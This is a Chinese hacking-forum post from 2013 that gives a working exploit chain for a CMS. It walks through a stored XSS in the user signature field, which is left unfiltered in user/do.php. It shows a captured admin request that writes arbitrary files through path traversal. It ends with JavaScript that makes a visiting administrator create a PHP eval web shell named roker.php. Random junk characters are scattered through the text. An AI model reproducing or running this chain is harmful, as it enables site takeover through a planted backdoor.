|
|
这个cms 以前 90有人发了个getshell,当时 是后台验证文件的问题
, N% c8 e1 @# Q1 b0 c* v2 ]" G3 T/ y+ z官网已经修补了,所以重新下了源码) j( \5 B. i6 u v9 q& L( U& A
因为 后台登入 还需要认证码 所以 注入就没看了。; v& Y x6 H- [$ N
存在 xss" x) p4 f2 m1 r5 f8 U
漏洞文件 user/member/skin_edit.php$ K2 v. I) _( X2 W2 a. s
本帖隐藏的内容<tr><td style="height:130px;"><span class="t"><i>*</i>签名:, }5 A8 X- `; d( D5 o0 ?% Z2 d) Q
6 X: H t) O6 Q9 t</span><textarea style="width:435px;height:120px;" id="content" name="CS_Qianm"><?php echo $cscms_qianm?>
/ R m. a7 f0 b- @. o
: t: T5 Y. b; i& S* Q3 `) S</textarea></td></tr>
) b7 b. f8 e- ~
6 ~4 F4 [7 q. ?- B9 q user/do.php
8 M' M. w" _, |5 W* w1 E. s" L0 t5 G
2 x, L; t' q1 D( w# kif($op=='zl'){ //资料
! @, v e4 o* j: @" d
! h' V8 @- U4 \ if(empty($CS_QQ)||empty($CS_Nichen)||empty($CS_City)||empty($CS_Email)) 8 }/ W8 H& b( u+ i7 `5 X O; n
exit(Msg_Error('抱歉,请把资料填写完整!','javascript:history.go(-1);'));' H) N# S: @' c% Q
! L* x2 I3 \6 d2 c, J* D, }9 x4 H7 c $sql="update ".Getdbname('user')." set CS_Nichen='".$CS_Nichen."',CS_Email='".$CS_Email."',
: d9 u3 @# y1 Z C . H) Y8 J' s* U
CS_Sex=".$CS_Sex.",CS_City='".$CS_City."',CS_QQ='".$CS_QQ."',CS_Qianm='".$CS_Qianm."'
. I# E" _7 d, t/ x$ [ where CS_Name='".$cscms_name."'";2 C0 }% n# ^4 }+ g2 }; x
$ S5 z2 u4 T% Q- `: ^ if($db->query($sql)){
, h) F# ]+ s: j1 b
; ]& J0 u. s: u7 E8 }' o. W( l exit(Msg_Error('恭喜您,修改成功了!','javascript:history.go(-1);'));
' y' w" v1 v; g5 L$ n& m, _) O 9 @4 p7 Y$ U4 _: ~; Y
}else{
. R( G# M& {/ W8 ^9 A4 F
0 e" r; o# H. M: d+ i* U2 ^ exit(Msg_Error('抱歉,修改失败了!','javascript:history.go(-1);'));
& z9 w1 \! D: n. _3 x0 n8 g! p6 ]
; L# c" e& J; p9 s. H$ B/ f! `5 Y }
0 c, _5 A8 I* l( y. d" @$ i8 L7 M$ l& b
0 ]6 W# p6 \& @: P4 f5 I
3 p2 p" {. n1 a: L( @9 }没有 过滤导致xss产生。
' s' S3 d$ K, N- Z: m后台 看了下 很奇葩的是可以写任意格式文件。。$ l: }% V) \: |1 K z& U( u( T" P
抓包。。7 L7 P# q: H7 E9 L# m% }
( ~# s8 T8 G! H" i7 `' i% g; }+ g7 t/ o" \$ C
本帖隐藏的内容POST /admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/ HTTP/1.1
; p) P" G+ D d# Y- Y
2 l: y e1 K& ?1 k& wAccept: text/html, application/xhtml+xml, */*! J$ {$ R/ J# ^: \& i
* U9 M6 Y8 I, l5 w+ d4 u- ?Referer: http://127.0.0.1/admin/skins/ski ... l/&name=aaa.php
+ J- A# F" n/ W' d 6 Q: q- M1 _ Y7 N
Accept-Language: zh-CN
; ~3 V" B6 e+ h' h+ w& \
6 [: {0 X# q, q8 }! EUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)5 u5 L$ m- L* x% X% v7 b. W) S1 p
2 T% @. j5 t$ \9 v$ Z1 _2 m( ]8 q' H+ X6 f
Content-Type: application/x-www-form-urlencoded6 R' n, R# |- B' V# K4 l
! v( Z; r9 w) Q; ?9 c* q* o
Accept-Encoding: gzip, deflate; I+ x: e$ ~# x: p+ D
1 G6 D' c4 {8 f
Host: 127.0.0.1% J+ |) o4 Y( `$ K9 J4 v0 P! u
/ y# Z2 Q( z+ e" ~/ C- [Content-Length: 383 N6 m H ?0 L! |
3 g& `- A0 P) S# X' Z# [9 B8 L
DNT: 1) y% d+ J. V( N. q' O" `
/ G- E. d1 G* d
Connection: Keep-Alive9 O: S* _& U0 |" W1 A1 s8 \6 E
# t) w; ~* l' \. Q2 vCache-Control: no-cache& D! V6 B6 w1 v9 j( X$ M2 F( z
* K. \' U% E9 Y* n/ A9 sCookie: CS_AdminID=1; CS_AdminUserName=aaaa; CS_AdminPassWord=12949e83a49a0989aa46ab7e249ca34d; CS_Quanx=0_1%2C1_1%2C1_2%2C1_3%2C1_4%2C1_5%2C2_1%2C2_2%2C2_3%2C2_4%2C2_5%2C2_6%2C2_7%2C3_1%2C3_2%2C3_3%2C3_4%2C4_1%2C4_2%2C4_3%2C4_4%2C4_5%2C4_6%2C4_7%2C5_1%2C5_2%2C5_3%2C5_4%2C5_5%2C6_1%2C6_2%2C6_3%2C7_1%2C7_2%2C8_1%2C8_2%2C8_3%2C8_4; CS_Login=980bb0dfb9c7ba8ac7676b6f4eea2c4b; CS_AdminUP=1; cs_id=2; cs_name=test; PHPSESSID=36db4a484bdbd090ad9846e3b7f655944 R: d0 @% H$ T- r; `5 I* r2 e
, q/ e9 y1 l; }! b" G
4 ^) O# ^, v: b/ oname=aaa.php&content=%3Cs%3E%3Ca%25%3E
$ a3 u [9 ~. Q5 M
- {7 ?! {3 s0 e
- Y$ C' m9 d( r( o A( v! \8 j
6 D0 X9 _/ b4 N9 n. l# K- c. |于是 构造js如下。' S+ B9 V# u& @" z4 K7 \0 c
3 l: P! Q7 o* M. M
本帖隐藏的内容<script> 4 `% G4 G% W# a/ R5 c, X
thisTHost = top.location.hostname;
* A, `+ ]( c) }
# H) E1 u( _) V. |thisTHost = "http://" + thisTHost + "/admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/";! }8 G2 W1 b: A6 u
) _6 d. r5 `* k7 L8 Lfunction PostSubmit(url, data, msg) { - x. ~; p1 S/ F& f
var postUrl = url;+ r8 X' m4 Z3 [3 c. G5 P
; `+ Q+ w) ?1 O$ Q$ A+ q5 d V
var postData = data; 7 c- @0 Q6 Z; R0 r" e
var msgData = msg;
5 q, R- f) g2 R. N% {7 m( q var ExportForm = document.createElement("FORM");
' w) p& C/ \; O' X document.body.appendChild(ExportForm); . p: j9 |9 }( U- w$ Q
ExportForm.method = "POST"; * {2 }5 l! c/ B, e: P$ c* C
var newElement = document.createElement("input"); ?. |: j* W3 D/ I/ u9 h
newElement.setAttribute("name", "name");
+ x1 f+ m% w! s$ M" t* P. F newElement.setAttribute("type", "hidden");
( ]5 a. j* o* S8 `+ m8 i: l. D- p- e8 A var newElement2 = document.createElement("input");
7 v% A7 Y# k8 ~$ g6 e5 l) \ newElement2.setAttribute("name", "content");
! O9 ?$ N7 a- Z0 B, Z9 {9 g newElement2.setAttribute("type", "hidden"); 1 |. @# I9 y1 f8 y$ Z1 j
ExportForm.appendChild(newElement); 1 \, q* Q6 U0 J. M
ExportForm.appendChild(newElement2);
# x# p `8 g. d- b' d- h; a7 N' X newElement.value = postData; 6 E3 T* Z) q# e* w
newElement2.value = msgData;
( b1 u d9 }' _! `. [6 E$ G, | ExportForm.action = postUrl;
3 H7 k3 h* x+ [5 X. z9 d ExportForm.submit(); ) r& h' d+ _& E. T3 h
};
% b" E$ i6 I% P 4 E5 `( H) Q1 j6 S
PostSubmit(thisTHost,"roker.php","<?php @eval($_POST[123]);?>");
$ S X8 i% O+ k- j# v$ |1 U) ^& A9 z: Y
L1 ~% H& @) l: ]</script>. Y3 f; |$ _4 h$ `/ e
( K1 G3 \- D) \9 l, H, c/ X F2 N( J# b. n3 L
& u4 m. X4 e9 M2 v$ m
http://127.0.0.1/user/space.php?ac=edit&op=zl 修改签名处 插入
& d' g% }& y* ^4 a1 H8 G$ @ ]用你的账号给管理写个 私信 或者让他访问 你的主页http://127.0.0.1/home/?uid=2(uid自己改)
8 J/ m- T( C: ^就会 在 skins\index\html\目录下生成 roker.php 一句话。 |
( z3 z3 x9 \% f; Z
|
|
发表于 2013-11-6 18:09:37
收藏
支持
反对